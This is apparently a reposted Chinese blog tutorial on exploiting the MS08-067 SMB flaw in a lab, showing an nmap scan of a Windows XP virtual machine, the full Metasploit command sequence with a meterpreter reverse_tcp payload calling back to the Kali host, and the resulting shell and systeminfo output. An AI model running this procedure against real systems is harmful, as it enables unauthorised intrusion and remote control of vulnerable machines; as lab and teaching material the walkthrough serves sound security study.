登录
当前位置: 首页 > 工具软件 > ms-sys > 使用案例 >

ms08-067漏洞利用

吕琪
2023-12-01

ms08-067漏洞利用

实验环境

1.kali linux(ip:192.168.131.131)

2.windows xp (ip:192.168.131.134)

端口检测

nmap 192.168.131.134

root@kali:~# nmap 192.168.131.134
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 14:17 CST
Nmap scan report for 192.168.131.134
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B1:96:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds

发现445和3389等高危端口都是开放状态;

漏洞利用

1.打开msf工具搜索ms08-067;(search 08-067)

[i] Database already started
[i] The database appears to be already configured, skipping initialization
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search 08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf >

 

2.发现有一个可用的exp(命令:use exploit/windows/smb/ms08_067_netapi)

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(windows/smb/ms08_067_netapi) >

3.查看exp需要的配置(命令:show options)

msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

4.设置目标主机;(命令:set rhost 192.168.131.134)

msf exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.131.134
rhost => 192.168.131.134
msf exploit(windows/smb/ms08_067_netapi) >

5.设置一个payload(windows常用的payload:windows/meterpreter/reverse_tcp)(命令:set payload windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) >

6.再查看payload需要的配置(命令:show options)

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.131.134  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

7.发现需要设置本地IP(命令:set lhost 192.168.131.131)

msf exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.131.131
lhost => 192.168.131.131
msf exploit(windows/smb/ms08_067_netapi) >

8.如不能确定目标主机操作系统(可以不设置target,这里就不设置了,采用缺省配置)

9.开始攻击(命令:exploit)

msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.131.131:4444 
[*] 192.168.131.134:445 - Automatically detecting the target...
[*] 192.168.131.134:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.131.134:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.131.134:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.131.134
[*] Meterpreter session 1 opened (192.168.131.131:4444 -> 192.168.131.134:1040) at 2020-09-10 14:25:53 +0800

meterpreter >

10.获取shell,查看主机信息(shell、systeminfo)

meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 Z-64EC8C23799B4
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          Z Y H
Registered Organization:   
Product ID:                76487-011-0652134-22807
Original Install Date:     8/25/2020, 11:09:41 AM
System Up Time:            0 Days, 0 Hours, 30 Minutes, 29 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 142 Stepping 10 GenuineIntel ~1992 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     511 MB
Available Physical Memory: 350 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,004 MB
Virtual Memory: In Use:    44 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.131.254
                                 IP address(es)
                                 [01]: 192.168.131.134

C:\WINDOWS\system32>

成功拿到shell;

 类似资料:

相关阅读

修复bash漏洞的shell脚本分享深入浅析ImageMagick命令执行漏洞在npm install上发现了4个漏洞使用PHP的MySQL注入保护和漏洞标志PHPCMS2008广告模板SQL注入漏洞修复

相关文章

9.18吉利一面用String写代码可能会内存泄漏吉利商用车-运维面经(20221222)保利威一面吉利秋招面经

相关问答

vue.js - node14有什么漏洞?package-lock.json包需求漏洞Npm漏洞无法修复JUNIT测试漏洞方法检查Elasticsearch的log4j漏洞

相关文档

格式化字符串漏洞利用论 PHP 常见的漏洞利用 Python 进行数据分析 · 第 2 版像 IDE 样使用 VIMAdobe Bridge 用户指南
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.